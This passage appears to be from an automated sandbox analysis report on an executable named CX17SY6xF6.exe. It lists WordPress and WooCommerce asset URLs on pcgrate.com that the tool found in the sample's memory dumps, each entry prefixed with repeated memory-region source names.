                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=5.5.
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=5
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=5.5.
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/jquery-ui-touch-punch/jquery-ui-touc
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/style.css?ve
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors-styl
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/css/compatibility/elementor/elementor-global.min.cs
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/css/main.min.css?ver=9.12.0
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/fonts/FontAwesome/css/all.min.css?ver=9.12.0
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/fonts/icomoon-the7-font/icomoon-the7-font.min.css?v
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/js/above-the-fold.min.js?ver=9.12.0
